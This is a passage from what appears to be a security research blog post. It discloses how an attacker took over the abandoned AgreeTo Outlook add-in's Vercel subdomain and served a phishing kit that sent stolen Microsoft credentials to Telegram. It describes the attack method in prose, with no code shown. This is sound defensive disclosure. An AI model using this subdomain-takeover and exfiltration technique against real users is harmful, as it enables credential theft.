Back Koi Research AgreeToSteal: The First Malicious Outlook Add-In Leads to 4,000 Stolen Credentials Oren Yomtov , Idan Dardikman , February 11, 2026 This is the first known malicious Microsoft Outlook add-in detected in the wild. But the developer who built it isn't the attacker. In 2022, a developer built a meeting scheduling tool called AgreeTo and published it to the Microsoft Office Add-in Store. It worked. People liked it. Then the developer moved on, and the project died. The add-in stayed listed in Microsoft's store. The URL it pointed to - hosted on Vercel - became claimable. An attacker claimed it, deployed a phishing kit, and Microsoft's own infrastructure started serving it inside Outlook's sidebar. By gaining access to the attacker's exfiltration channel, we were able to recover the full scope of the operation: over 4,000 stolen Microsoft account credentials, credit card numbers, and banking security answers. The attacker was actively testing stolen credentials yesterday. The infrastructure is live as you read this. This is the story of how a dead side project became a phishing weapon. It starts with how Office add-ins work. Koidex report for AgreeTo add-in How Office Add-Ins Work (and Why That's a Problem) Office add-ins aren't installed code. They're URLs. A developer submits a manifest to Microsoft - an XML file that says "load this URL in an iframe inside Outlook." Microsoft reviews the manifest, signs it, and lists the add-in in their store. But the actual content - the UI, the logic, everything the user interacts with - is fetched live from the developer's server every time the add-in opens. Here's what that looks like. This is the manifest Microsoft signed for AgreeTo in December 2022: Note the ReadWriteItem permission. That grants the add-in the ability to read and modify the user's emails. It was appropriate for a meeting scheduler. It's less appropriate for whoever controls that URL today. There's no static bundle to audit. No hash to verify. Whatever outlook-one.vercel.app serves right now is what runs inside Outlook. If the developer pushes a bad update, it's live immediately. If someone else takes control of that URL, they control what every user of that add-in sees - inside Outlook's trusted sidebar, with full read and write access to their email. Microsoft blessed this manifest once, in December 2022. They never check what the URL serves again. Built, Loved, Abandoned AgreeTo was a real product. An open-source meeting scheduling tool with a Chrome extension (1,000 users, 4.71-star rating, 21 reviews) and an Outlook add-in published to Microsoft's store in December 2022. The developer maintained an active GitHub repo - a full TypeScript monorepo with Microsoft Graph API integration, Google Calendar support, and Stripe billing. This was someone building a business. Then development stopped. The last Chrome extension update shipped in May 2023. The developer's domain, agreeto.app, expired. By July 2024, users were leaving reviews on the Chrome extension: "It was all 5 stars for me until this morning. I tried to log in, and the agreeto.app website is expired. Did this app die? I hope not." "Did this app die? No longer works. Makes you login and goes to a GoDaddy holding page. I use this app all the time and does exactly what I need to do." Google eventually removed the dead Chrome extension in February 2025. But the Outlook add-in stayed listed in Microsoft's Office Store, still pointing to a Vercel URL that no longer belonged to anyone. AgreeTo page on Office Add-ins marketplace The Takeover At some point after the developer abandoned the project, their Vercel deployment was deleted. The subdomain outlook-one.vercel.app became claimable. An attacker grabbed it. They deployed a four-page phishing kit: a fake Microsoft sign-in page, a password collection page, an exfiltration script, and a redirect. That's all it took. They didn't submit anything to Microsoft. They weren't required to pass any review. They didn't create a store listing. The listing already existed - Microsoft-reviewed, Microsoft-signed, Microsoft-distributed. The attacker just claimed an orphaned URL, and Microsoft's infrastructure did the rest. The fingerprints of two different authors are visible across the infrastructure. The original developer's assets - icons, OAuth handlers, Microsoft design files - are all 404. The attacker didn't recreate them because they didn't have the source code. They only deployed what they needed: the phishing flow. The Attack When a victim opens the AgreeTo add-in in Outlook, they don't see a meeting scheduler. They see a Microsoft sign-in page. The phishing page They enter their email, then their password. A single JavaScript function collects the credentials along with the victim's IP address, and sends everything to the attacker via Telegram's Bot API. No command-and-control servers. No complex infrastructure. Just a fetch() call to Telegram. Then a loading spinner for a few seconds